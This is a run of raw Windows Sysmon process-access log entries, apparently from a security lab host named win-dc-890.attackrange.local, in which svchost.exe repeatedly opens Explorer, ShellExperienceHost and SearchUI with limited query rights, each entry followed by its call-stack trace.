07:47:08.387{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.387{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.387{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
